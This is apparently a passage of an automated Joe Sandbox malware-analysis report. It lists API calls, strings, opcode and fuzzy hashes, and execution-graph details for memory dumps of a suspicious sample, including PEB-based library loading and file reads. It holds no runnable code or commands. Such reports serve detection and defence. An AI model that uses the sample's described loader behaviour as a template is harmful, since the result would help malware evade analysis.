                                                                    • Instruction ID: bfe07f463776b61d04e823ccf234541978b4a7f3b1c61aeb257f52bea8379434
                                                                    • Opcode Fuzzy Hash: e03fe9127c9d733032cbc01fd55d734dfaa4255945131f8314c39837359b6722
                                                                    • Instruction Fuzzy Hash: F241F8F9E8020D8FD7229B28ECD5717FAA0AB887D5F000967DA1686340EB759464CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID:
                                                                    • API String ID: 2102423945-0
                                                                    • Opcode ID: a3c7abf6de1cc2b6f8444ce611d50d7b01a5ff6300dc1c2332dba0014e64f2b7
                                                                    • Instruction ID: 27c45e9ab65aa02c37dc01c005626cceed55afc88ba615149bd80d12369629e2
                                                                    • Opcode Fuzzy Hash: a3c7abf6de1cc2b6f8444ce611d50d7b01a5ff6300dc1c2332dba0014e64f2b7
                                                                    • Instruction Fuzzy Hash: C2312BB5A047019FD324DF29D880A27B7E9FF88354F104A2EE99983750EB71E855CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,02FA8532,00000000,00000001,00000000,00000000,00000000,?,02FA8157,00000001,00000214,?,02FA84E8), ref: 02FAA9C5
                                                                      • Part of subcall function 02FA6CDC: __getptd_noexit.LIBCMT ref: 02FA6CDC
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 328603210-0
                                                                    • Opcode ID: 089f156e33ab4ab226c4760b1dde31648cf18d050c0d7a99f319a5877a9fa4a2
                                                                    • Instruction ID: 7b6a1b76a6e7d6a8b993588579179220bb3f6865e3c372340a8d01da26e70025
                                                                    • Opcode Fuzzy Hash: 089f156e33ab4ab226c4760b1dde31648cf18d050c0d7a99f319a5877a9fa4a2
                                                                    • Instruction Fuzzy Hash: BF0128B1B0021A8FEB258E24CC74BAB33A4BF853E4F058519ED16C7180DB30D814C650
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetSystemInfo.KERNEL32(02FBEC40,02F433B4,?,02FA36AD), ref: 02F499A4
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: InfoSystem
                                                                    • String ID:
                                                                    • API String ID: 31276548-0
                                                                    • Opcode ID: 87670970420f1f20757f7346a186c8adaf821c956076a1ba9ba39f60d7d3a3ce
                                                                    • Instruction ID: 5eb53363db6914c9aa75afa5ef22663197d5674475497dff83901015e5d0bf92
                                                                    • Opcode Fuzzy Hash: 87670970420f1f20757f7346a186c8adaf821c956076a1ba9ba39f60d7d3a3ce
                                                                    • Instruction Fuzzy Hash: 54014CF5D812688FD393DF39A9D6297BAE4BB046C67440D37D906D2200EFB45424CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID:
                                                                    • API String ID: 2102423945-0
                                                                    • Opcode ID: d49f724bfc57ff056881ccfc2f64776627580c3b2d968b77fb2da9cf6968aa75
                                                                    • Instruction ID: 67abe35660bcf0462e8e17c71ff324ec78093665fcbae6263359dad974552579
                                                                    • Opcode Fuzzy Hash: d49f724bfc57ff056881ccfc2f64776627580c3b2d968b77fb2da9cf6968aa75
                                                                    • Instruction Fuzzy Hash: D2F02B317402042BC630961EDC0AD6BBB6DCFC3B24F0402A5FE1C8B390E9629821C1F2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlEncodePointer.NTDLL(00000000,02FA9841,02FBDD38,00000314,00000000,?,?,?,?,?,02FA714A,02FBDD38,Microsoft Visual C++ Runtime Library,00012010), ref: 02FA7FF4
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID:
                                                                    • API String ID: 2118026453-0
                                                                    • Opcode ID: 86baff4715940f54cdd7af386cbac284425c0f1bbfffe06e1086ac1ef1861b27
                                                                    • Instruction ID: e2efbb10df9ee0eef41830eb783b12288d8dcbd716c7409885965b744125d944
                                                                    • Opcode Fuzzy Hash: 86baff4715940f54cdd7af386cbac284425c0f1bbfffe06e1086ac1ef1861b27
                                                                    • Instruction Fuzzy Hash:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fe949f4db79c0fb07479b10b96d6eb37ab230a312b52561a4276eabf098e6e51
                                                                    • Instruction ID: 6a1c0a4f94806af071e61ed71b3c9294df00301916cd630ab32574b43f64851c
                                                                    • Opcode Fuzzy Hash: fe949f4db79c0fb07479b10b96d6eb37ab230a312b52561a4276eabf098e6e51
                                                                    • Instruction Fuzzy Hash: 95F0A070455284AFE7269B18D45CBB43B99DB0034CF8844D8D9081F262C3B7D4CAC350
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    • no entry point [%s] in shared library [%s], xrefs: 02F8737B
                                                                    • sqlite3_extension_init, xrefs: 02F872C2
                                                                    • error during initialization: %s, xrefs: 02F873D5
                                                                    • not authorized, xrefs: 02F872A1
                                                                    • unable to open shared library [%s], xrefs: 02F8730A
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: error during initialization: %s$no entry point [%s] in shared library [%s]$not authorized$sqlite3_extension_init$unable to open shared library [%s]
                                                                    • API String ID: 2102423945-3409965631
                                                                    • Opcode ID: c1b7eebc57c42fb8e25cbc9235de092b7467c7f0677de5ddd4c846d79f5db5df
                                                                    • Instruction ID: 35e2f83bfa982947bd66b9fdf2298414810b90b2659726366b6b8c4113730e56
                                                                    • Opcode Fuzzy Hash: c1b7eebc57c42fb8e25cbc9235de092b7467c7f0677de5ddd4c846d79f5db5df
                                                                    • Instruction Fuzzy Hash: 2051B7767402055BE710FA69DC81BBBF7D8EF84394F144528FF48C6240EB75E9158BA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?), ref: 02F47AD0
                                                                    • LockFileEx.KERNEL32(?,00000001,00000000,000001FE,00000000,?), ref: 02F47B1B
                                                                    • LockFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 02F47BB6
                                                                    • GetLastError.KERNEL32 ref: 02F47BC2
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: FileLock$ErrorLastVersion
                                                                    • String ID:
                                                                    • API String ID: 1561719237-0
                                                                    • Opcode ID: 70fe1e08a9c53c44fd0d258a4e8bbd76c4b7debc563f258b699ac66b8745fca0
                                                                    • Instruction ID: b721fd61f8e3b56b4703558ed1703e88d78d0b3ef1ecbd99c3c96b2c46a5db68
                                                                    • Opcode Fuzzy Hash: 70fe1e08a9c53c44fd0d258a4e8bbd76c4b7debc563f258b699ac66b8745fca0
                                                                    • Instruction Fuzzy Hash: 94318571E402289FDB25DF28DC85BDBFBB4BB08785F0045AAE645D7280DB709A50CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 2102423945-1231421067
                                                                    • Opcode ID: 27f67682b561ad5f8226aa7fd386785ec89a59eb65e1d8b58660b3ebba5d7ddd
                                                                    • Instruction ID: 3dc80a980104040f78f8aba60b492808aca92909302b05743672120af38d6db3
                                                                    • Opcode Fuzzy Hash: 27f67682b561ad5f8226aa7fd386785ec89a59eb65e1d8b58660b3ebba5d7ddd
                                                                    • Instruction Fuzzy Hash: 7E61A2206047A15BD32A8F3D88E45B4FFE19F91189B8885DDEFDB8B383D166D644C760
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 02F53396
                                                                      • Part of subcall function 02F4D4E0: _memset.LIBCMT ref: 02F4D514
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F40000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_2f40000_images.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 2102423945-1231421067
                                                                    • Opcode ID: b1f8be58eb0fcf975b5a5d71ff39cfa03b6ca2f54e3481152190b3e7d21fe2b5
                                                                    • Instruction ID: 3c6529b8a0bd544a1746392601ab6bc133ce49a41d2c2fc8fb4b2a06a9fc9940
                                                                    • Opcode Fuzzy Hash: b1f8be58eb0fcf975b5a5d71ff39cfa03b6ca2f54e3481152190b3e7d21fe2b5
                                                                    • Instruction Fuzzy Hash: EE510671B043208BD7219F2D8845B16B7E2AFC47E4F19859DEF998B341DBB1E806CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:59%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:30
                                                                    Total number of Limit Nodes:1
[Execution graph image; rendered node text only: entry 326010e, repeated calls into 326001a (GetPEB) with LoadLibraryA at 3260034, then CreateFileA at 3260224, ReadFile at 3260246, Sleep at 326028b and GetExitCodeProcess at 3260312, ending at 32603a6.]

                                                                    Callgraph

                                                                    • Executed
                                                                    • Not Executed
                                                                    • Opacity -> Relevance
                                                                    • Disassembly available
[Call graph image; rendered node text only: Function_03260000, Function_03260400, Function_0326010E (calls Function_03260000 and Function_0326001A), Function_0326001A.]

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • LoadLibraryA.KERNELBASE(user32.dllntdll.dll), ref: 03260195
                                                                    • CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0326023C
                                                                    • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 0326026C
                                                                    • Sleep.KERNELBASE(00002EE0), ref: 03260290
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.516552772.0000000003260000.00000040.00000400.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_3260000_cmd.jbxd
                                                                    Similarity
                                                                    • API ID: File$CreateLibraryLoadReadSleep
                                                                    • String ID: .dll$1$2$kernel32$ntdll.dll$user32.dllntdll.dll
                                                                    • API String ID: 1602266143-1375677587
                                                                    • Opcode ID: d273159145775cbf99d807b09e3f9e0c2e71cc428fd30a0d8cec744a2f70898a
                                                                    • Instruction ID: c376729b955e4890ab21c7acb614fad369d8ad6d611b32426dccfa3656ca32b5
                                                                    • Opcode Fuzzy Hash: d273159145775cbf99d807b09e3f9e0c2e71cc428fd30a0d8cec744a2f70898a
                                                                    • Instruction Fuzzy Hash: C08129B1D14208ABEB10DFE0CC49FEEBBBCEF44301F148059F915EA141E7749A859B65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%